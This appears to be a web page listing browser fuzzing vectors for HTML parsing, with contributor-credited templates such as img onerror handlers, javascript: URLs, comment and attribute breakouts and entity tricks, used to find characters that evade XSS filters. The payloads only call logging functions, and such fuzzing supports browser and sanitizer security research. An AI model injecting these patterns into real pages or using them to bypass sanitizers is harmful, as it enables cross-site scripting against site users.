Fuzz Vectors

Searching for "HTML"

Your browser identified as

General Crawlers unknown

All vectors

Description	Vector	Created by
chars allowed between a html entity	<!-- sample vector --> <img src=x onerror="&#xchr61lert(num);logChr(num);">	@S1r1u5_
Characters in between protocol in js url (FORK) XXX	<a href="javaschrcript:alert(1)" id="fuzzelementnum">test</a>	@igc_iv
testerdd	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>numnum	@script92538206
Valid HTML Attribute Seperators	<!-- sample vector --> <imgchrsrcchronerror=logChr(num)>	@Lamp_AE
ignored chars in html encoding and attributes2	<img src=x onerror="l&#chr111;gChr(num)//" />	@irsdl
html elements that end scripts	<script>//</datahtmlelements> logChr(num); </script>	@Nomicon3
Characters that close a HTML comment 4	<!-- --chr> <img src=xxx:x onerror=log(num)> -->	@irsdl
Characters allowed between event handlers and equal sign	<img src="about:blank" onerrorchr=logChr(num)>	@peksa
HTML input image tag attributes that run JavaScript	<input datahtmlattributes="customLog('datahtmlattributes')" type="image" src="about:blank">	@peksa
HTML input tag attributes that run JavaScript	<input datahtmlattributes="customLog('datahtmlattributes')" type="text">	@peksa
Characters that escape html input tag	<input value="" chr<script>logChr(num)</script> foo="" type="text">	@peksa
Characters that close a HTML comment 0021	<!--chr><img src=xxx:x onerror=log(num)> -->	@matttiko
char after lt and before still valid html	<chr,script>logChr(num);</script>	@p_laguna
Characters that can be used to terminate entities in an href	<a href="javascript&colonchrlog(num)" id="fuzzelementnum">test</a>	@tifkin_
Characters allowed between and in HTML entities in style attribute	<div style="x:expression(l&chr#x6F;gChr(num))">	@tifkin_
test for progress	<progress value="num" max="num"></progress>	@kinmenhacker
Characters allowed after domain	<a href="http://google.comchrbreakme" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters allowed before http	<a href="http://chrgoogle.com" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters allowed in between dashes to end html comments	<!-- -chr-> <script>logChr(num)</script> -->	@JohnathanKuskos
char after lt still valid html	<chra href=x onerror=logChr(num)>	@ethicalhack3r
characters allowd in html entities	<a href="javascript&cochrlon;alert(1)" id="fuzzelementnum">test</a>	@insertScript
Entities allowed with no semi colon	htmlStr = '<div title="'+dataentities.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(dataentities); } }catch(e){};	@garethheyes
HTML Entity in between and	<img src=xx:xx onerror="&chr#X61;lert(num);logChr(num)">	@MisterJyu
Characters allowed before slashes no protocol	<a href="chr//google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside slashes no protocol	<a href="/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash 2	<a href="http:chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash	<a href="http:chrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed after slash	<a href="http:/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside http	<a href="htchrtp://google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters transformed in expando attributes	<div id="fuzzelementnum" expandochr="123">test</div>	@garethheyes
Expandos attributes characters removed	<div id="fuzzelementnum" expandochr=123>test</div>	@garethheyes
Characters allowed instead of forward slash in url	<a href="chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of colon in js url	<a href="javascriptchralert(1)" id="fuzzelementnum">test</a>	@garethheyes
Tags that have the onload event	<datahtmlelements onload="customLog('datahtmlelements')">test</datahtmlelements>	@garethheyes
html dataentities before event handler	<img src="x" asdf/="_=" alt=" dataentitiesonerror=logChr(num) //">	@testacc40590139
Break out of HTML element from single quoted attribute	<img src='xx:xchr><img src=xx:x onerror=logChr(num)>'>	@peksa
Escaped characters that break out of single quote HTML attribute	<img src='xx:x\chr onerror="logChr(num)">'>	@peksa
Characters that escape single quoted HTML attributes	<img src='xx:xchr onerror="logChr(num)">'>	@peksa
Characters syntactically equivalent to double quote in HTML attributes	`"'><img src="#chr onerror=log(num)>	@p_laguna
Characters that break out of script variables	<script>x='<chrscript><img src=xx:xx onerror=logChr(num)>';</script>	@garethheyes
Characters that close a HTML comment 3	--><!-- -chr-> <img src=xxx:x onerror=log(num)> -->	@DOMXss
Characters that trigger a new attr after new line	<img src=1 title= x:xxchr/onerror=logChr(num)>	@garethheyes
Characters ignored in html event handler name	<img src=x onchrError="javascript:log(num)"/>	@mhswende
Characters allowed after ampersand in named character references	<a href="javascript&chrcolon;log(num)" id="fuzzelementnum">test</a>	@_cweb
Characters ending HTML closing tags (HTML4)	<style></stylechr<img src="about:blank" onerror=log(num)//></style>	@0x6D6172696F
Tags and events that execute javascript 2	<datahtmlelements dataevents="javascript:parent.customLog('datahtmlelements dataevents')"></datahtmlelements>	@garethheyes
Tags and events that execute javascript	<datahtmlelements datahtmlattributes="javascript:parent.customLog('datahtmlelements datahtmlattributes')"></datahtmlelements>	@garethheyes
Tags that execute onerror	<datahtmlelements src=1 href=1 onerror="customLog('datahtmlelements')"></datahtmlelements>	@garethheyes
Characters to separate class names in class attributes	<div class="foonumchrbar">HELLO</div> <script>document.getElementsByClassName('foonum')[0]?log(num):0</script>	@0x6D6172696F
Characters that close a HTML comment 002	<!--chr<img src=xxx:x onerror=log(num)> -->	@0x6D6172696F
Characters that close HTML tags	<script>log(num)</scriptchr	@0x6D6172696F
Characters allowed after script	<scriptchr>log(num)</script>	@garethheyes
Single character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrstyle=color:#FF1133;" id="copyTargetnum">num - test</div> </div>	@thewildcat
Entity character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="&#xhex6;style=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat
Characters syntactically equivalent to single quote in HTML attributes	`"'><img src='#chr onerror=log(num)>	@_cweb
Characters breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrchrstyle=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat
Characters before img	"'`><chrimg src=xxx:x onerror=log(num)>	@garethheyes
Characters before script	'`"><chrscript>log(num)</script>	@garethheyes
Characters in between protocol in js url	<a href="javaschrcript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed after attribute name	`"'><img src=xxx:x onerrorchr=log(num)>	@garethheyes
Characters allowed before protocol in js url	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed before colon in js url	<a href="javascriptchr:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters that close a HTML comment	--><!-- --chr> <img src=xxx:x onerror=log(num)> -->	@garethheyes
Characters allowed before attribute name	`"'><img src=xxx:x chronerror=log(num)>	@garethheyes